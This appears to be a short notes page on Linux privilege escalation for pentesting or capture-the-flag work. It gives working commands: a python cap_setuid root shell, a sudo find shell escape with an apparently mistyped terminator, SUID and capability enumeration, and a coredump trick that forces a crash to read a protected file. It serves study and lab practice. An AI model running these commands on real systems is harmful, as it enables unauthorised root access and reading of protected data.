Linux Privilege Escalation
- Linux Capabilities (getcap)
- sudo -ln (for when you get shell but don't have a password, do -l if you have password)
- check /opt and ~/
- SUID files
- cron-executed files
To get the capabilities of a binary, use the
getcap
command. For example, if you execute:getcap /usr/bin/python3.8
getcap -r / 2>/dev/null
and it returns
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
, you are then able to abuse setuid
, as follows:python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'
Files with the SUID bit set execute as the owner, rather than the current user. If a binary has the ability to execute a command, such as
find
, you may be able to use it to execute commands as root:sudo find . -exec /bin/bash /;
To find SUID files, execute the following command:
find / -perm -u=s -type f 2>/dev/null
(Likely) one-off privilege escalation techniques to provide future inspiration.
Situation: A SUID executable reads a file into memory that you lack permission to read. The executable has coredump generation enabled (Source code contains
prctl(PR_SET_DUMPABLE, 1)
or hinted at by a valgrind file). Note: Using GDB to debug the SUID executable will result in the executable not gaining privilege as GDB uses your current permission level.
Run the SUID executable to the point that it reads the file. Once read, background the process with
ctrl + Z
, use PS
to locate the executables' PID, and then send SIGSEGV to cause a segmentation fault (kill -SIGSEGV [PID]
). Finally, execute fg
to resume (and crash) the file, resulting in a crash file appearing (/var/crash/_path_to_executable.uid.crash).
Use apport-unpack to unpack the crash information into a new folder
apport-unpack /tmp/_path_to_executable.uid.crash /tmp/mycrash
. Switch to the /tmp/mycrash
directory.
apport-unpack output
Explore the content of the CoreDump using a command such as
strings CoreDump
. Hopefully, the file content you are looking for will appear. Last modified 9mo ago